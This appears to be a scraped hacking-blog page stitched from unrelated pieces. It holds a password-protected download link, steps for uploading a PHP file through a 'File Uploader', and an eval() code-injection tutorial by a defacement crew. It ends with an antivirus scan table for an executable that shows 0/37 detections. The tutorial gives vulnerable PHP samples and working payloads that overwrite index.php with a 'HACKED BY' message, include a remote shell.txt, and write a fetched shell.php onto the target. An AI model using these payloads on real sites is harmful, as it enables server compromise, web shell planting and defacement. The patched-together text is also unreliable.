http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb
Select the "File Uploader" to use Change the type to PHP. Choose your file. Click on Send it to the Server to upload your file. If uploaded sucessfully, you will get a message saying "File uploaded without any error" After the uploading process. In the right hand side see the Uploaded File URL. From there see your uploded file :D Demo website: |
############################################################################## # [+]Title: [Eval() Vulnerability & Exploitation] ############################################################################## # [+] About : ############################################################################## # Written by : GlaDiaT0R # Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com # Team : Tunisian Power Team ( DarkGh0st.Net ) ############################################################################## # [+] Summary: # [1]-Introduction # [2]-Detection # [3]-Vulnerable Source code # [4]-Exploiting.. ############################################################################## [1]-Introduction eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications, although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable. the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result. We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute. ======================================================= [2]-Detection PoC 1 : http://www.vulnsite.com/evalinject.php?ev=<? phpinfo(); ?> [ eval() execute the contents of the variable "ev" as PHP code ] ---------- PoC 2 : http://www.vulnsite.com/evalinject.php?ev=phpinfo(); [ eval() execute the contents of the variable "ev" as PHP code (without tags) ] ---------- PoC 3 : Changing the header or POST variable cited by: phpinfo () [or <? phpinfo ();> php code used . ] (With the Tamper Data) [ eval () execute a chain whose variable $ HTTP_USER_AGENT is so just change your header in PHP code ] ======================================================= [3]-Vulnerable Source code PoC 1 : <?php $Ev = $_GET['ev']; $string = ($Ev); $string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string); $string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string); echo $string; ?> ---------- PoC 2 : <?php $Ev = $_GET['ev']; $eva = stripslashes($Ev); eval($eva); ?> ---------- PoC 3 : <?php $string = stripslashes($HTTP_USER_AGENT); $string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string); $string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string); echo $string; ?> ======================================================= [4]-Exploiting.. ---------- Write or Create a page containing : Hacked by ... <?php $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ?> or $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ---------- To insert a remote page include using an url <?php include('http://www.website.com/shell.txt'); ?> or include('http://www.website.com/shell.txt'); ---------- Insertion of a distant code in the vulnerable website <?php $z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z); ?> or $z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z); ---------- Thank you for your attention. I hope you understood the process to exploit the eval () vulnerability .
SHA256: | 1563c8d90c3fc85b6b741d51df74caf94f1783028e35005294 fe17a95fd99eac |
SHA1: | 09036ddbd6a90cc872e06eb4b56336de81c000bb |
MD5: | 2aded45593b0d1377474808a129b6032 |
File size: | 458.0 KB ( 468946 bytes ) |
File name: | FreeMouseAutoClickerSetup.exe |
File type: | Win32 EXE |
Tags: | peexe |
Detection ratio: | 0 / 37 |
Antivirus | Result | Update |
---|---|---|
AhnLab-V3 | - | 20120922 |
AntiVir | - | 20120922 |
Antiy-AVL | - | 20120911 |
Avast | - | 20120922 |
AVG | - | 20120922 |
BitDefender | - | 20120922 |
ByteHero | - | 20120922 |
CAT-QuickHeal | - | 20120922 |
ClamAV | - | 20120922 |
Commtouch | - | 20120922 |
Comodo | - | 20120922 |
DrWeb | - | 20120922 |
Emsisoft | - | 20120919 |
ESET-NOD32 | - | 20120922 |
F-Prot | - | 20120922 |
Fortinet | - | 20120922 |
GData | - | 20120922 |
Ikarus | - | 20120922 |
Jiangmin | - | 20120922 |
K7AntiVirus | - | 20120921 |
Kaspersky | - | 20120922 |
McAfee | - | 20120922 |
McAfee-GW-Edition | - | 20120922 |
Microsoft | - | 20120922 |
Norman | - | 20120922 |
nProtect | - | 20120921 |
PCTools | - | 20120922 |
Sophos | - | 20120922 |
SUPERAntiSpyware | - | 20120911 |
Symantec | - | 20120922 |
TheHacker | - | 20120920 |
TotalDefense | - | 20120921 |
TrendMicro | - | 20120922 |
TrendMicro-HouseCall | - | 20120922 |
VBA32 | - | 20120921 |
VIPRE | - | 20120922 |
ViRobot | - | 20120922 |
Copyright © Dương-UG Blog's - Nguyễn Bình Dương